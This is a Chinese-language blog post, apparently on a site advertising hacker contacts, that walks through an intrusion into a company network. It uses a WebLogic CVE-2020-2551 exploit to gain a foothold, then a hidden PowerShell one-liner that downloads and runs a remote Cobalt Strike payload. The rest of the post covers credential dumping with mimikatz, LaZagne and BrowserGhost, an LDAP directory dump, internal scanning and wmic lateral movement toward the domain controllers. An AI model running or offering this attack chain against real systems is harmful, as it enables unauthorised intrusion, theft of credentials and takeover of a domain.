记录某次实战渗透测试过程

作者: 黑客网 分类: 正规黑客联系方式 发布时间: 2022-05-26 14:33

在某次项目中对某个网站的渗透测试,记录一下。

记录某次实战渗透测试过程

先做信息收集,使用oneforall收集一下子域名。

python3 oneforall.py --target xxxxx run

记录某次实战渗透测试过程

在对上面的扫描结果逐一测试的时候,发现某子域名有weblogic漏洞

记录某次实战渗透测试过程

通过weblogic漏洞利用工具扫描发现有CVE_2020_2551漏洞,管理员用户

记录某次实战渗透测试过程

判断是否出网

目标机器出网,并且能和VPS服务器通信

记录某次实战渗透测试过程

记录某次实战渗透测试过程

cs上线

执行poweshell看能不能上线

cmd.exe /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxx'))"

cs可以上线

拿到administrator权限,

记录某次实战渗透测试过程

密码收集

1.执行mimikatz获取密码

logonpasswords

记录某次实战渗透测试过程

2.使用LaZagne取各种连接工具密码、浏览器保存密码等

shell cmd.exe /c D:bealazagne.exe all -oN

记录某次实战渗透测试过程

3.抓取浏览器密码,使用BrowserGhost

记录某次实战渗透测试过程

dump LDAP

查询到目标机器在域内,域用户登录

shell wmic computersystem get domain

记录某次实战渗透测试过程

shell whoami /all

记录某次实战渗透测试过程

前面已经确定目标机器在域内,并且目标机器是域用户登录。

域成员用户可以通过LDAP访问域的目录数据库从而看到整个域的信息。

这是使用的一种方式是通过 ADExplorer软件dump

将ADExplorer.exe上传到目标机器,使用以下命令执行

D:beaxxADExplorer.exe -snapshot "" D:beaxxresult.dat /accepteula

记录某次实战渗透测试过程

将resul.dat 在本地用ADExplorer打开即可看到域的信息

记录某次实战渗透测试过程

扫描内网

查看本机IP,本机IP为192.168.10.3.

使用fscan工具扫描一下192.168.10内网段,从扫描结果看出192.168.10.10和192.168.10.32应该是域控服务器

记录某次实战渗透测试过程

记录某次实战渗透测试过程

横向

通过LDAP和内网扫描看到域内有两台域控:192.168.10.10、192.168.10.32

判断用户权限

shell whoami /all

记录某次实战渗透测试过程

记录某次实战渗透测试过程

shell net group "domain admins" /domain

记录某次实战渗透测试过程

比较幸运,上线就是域管用户可以直接使用域管用户身份横线域内其他机器

先尝试横向域控192.168.10.10机器,wmic可用,通过wmic进行横向

shell wmic /node:192.168.10.10 os get name

记录某次实战渗透测试过程

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

标签云